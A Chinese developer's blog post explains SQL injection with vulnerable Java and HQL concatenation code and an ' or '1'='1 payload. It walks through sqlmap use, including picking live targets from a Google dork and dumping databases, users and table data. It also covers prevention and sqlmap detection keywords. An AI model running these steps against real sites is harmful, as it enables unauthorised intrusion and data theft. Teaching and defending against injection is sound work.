我们在开发过程中不仅要保证业务功能的完整性,更要保障安全性.
在刚从事工作时,我并没有关注一些安全性相关的知识,工作一年之后很多业务技术都有所掌握,之后就参与到了测试组的工作中去.从那个时候我才知道,白盒,黑盒,单元测试,压力测试,等等一些知识.起初就是觉得好玩,并没有立志要成为一个白帽子,所以一路走来,小打小闹.
背景
出现的安全问题就不说那么多了,作为开发人员应该都清楚,后果是非常严重的.OWASP TOP10中把SQL注入排在了第一位.
原理
比如下面的代码
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
使用hql的代码
Query HQLQuery = session.createQuery(“FROM accounts WHERE custID='“ + request.getParameter("id") + "'");
这样的代码有问题么?
如果这样传递参数呢?http://example.com/app/accountView?id=' or '1'='1
这就是简单的注入实例
工具
原理知道了,通过拼接sql语句,导致 语句不会按照自己的预期执行.我们通过使用sqlmap来完成sql注入的检测.
sqlmap: 注入检测
burpsuite: 请求代理
GHDB:谷歌黑客数据库(通过谷歌检索查询漏洞)
webshell: 入侵成功后可以上传脚本
中国菜刀:通过shell连接服务器,不过这个版本比较老,但是还挺好用
tips: 我们想要发现是否存在注入漏洞,所以对于渗透,上传webshell等不过多关注.
sqlmap 工具的使用
安装
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
概述
我们通过help命令对sqlmap有一些了解.
- Target: 目标
- -u : 指定目标url 比如
http://www.site.com/vuln.php?id=1
- -g: 利用谷歌搜索语法,比如
inurl:newsid=
- -u : 指定目标url 比如
- Request: 请求参数
- --date=DATA: Post提交参数
- --cookie=COOKIE
- --random-agent: 随机代理请求头User-Agent
- --proxy :使用代理连接
- Injection: 注入配置
- --dbms: 指定后台数据库
- Detection: 侦察
- --level=LEVEL: 侦察等级 1-5(默认1)
- --risk=RISK: 风险等级1-3(默认1)
- Enumeration:检索
- -a: 查询所有
- -b: DBMS banner
- --current-user: 查询用户当前等级
- --current-db: 查询用户当前数据库
- --passwords: 查询用户密码
- --tables: 查询表
- --columns :查询列
8.--schema: 查询schema
9.--dump: 获取数据 - --dump-all:
- -D DB :检索指定数据库
- -T TBL: 检索指定表
13.-C COL:检索指定列
tips: 其他涉及到shell等注入的就不介绍了,我们主要的任务是如何检测一个sql是否存在注入
使用方法
- 我们通过谷歌黑客数据库查找目标
- 选择Google Dork Description:
inurl:"sitegenius/topic.php"
- Google搜索后选择一个目标
- 查询当前数据库
./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库
./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库
./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户
./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户
./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名
./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库” // 获取表的列名
./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
注入预防
- java中查询语句时候不要使用sql拼接,可以使用PreparedStatement
- hibernate中不要拼接hql,尽量使用占位符
- mybatis中尽量使用#{},避免使用${}的参数方式.
- 请求过滤器: 如果获取到非法连接则拒绝.
sqlmap统计了注入的技术
1. 基于布尔的注入
2.基于错误的注入
3.内联注入
4.堆栈查询注入
5.至于时间注入
6.union查询注入
涉及到的关键字有:
boolean注入: (' ,<',">, AND ,%',(SELECT,--, OR ,)*,
union注入: ORDER,UNION,MAKE_SET,ELT
time注入:SLEEP,PG_SLEEP,DELAY,WAITFOR
inline注入:..)',
空格处理关键字:/**/,BETWEEN,/**_**/,'%09', '%0A', '%0C', '%0D', '%0B',--%0A,%S%E%L%E%C%T
大致通过这些就可以判断,
- 请求头过滤: sqlmap 默认的请求
agent:sqlmap/1.1.3.2#dev (http://sqlmap.org)
此外,对于一些常用的代理工具都可以进行一些拒绝处理,比如charles,burpsuite,fiddler 等等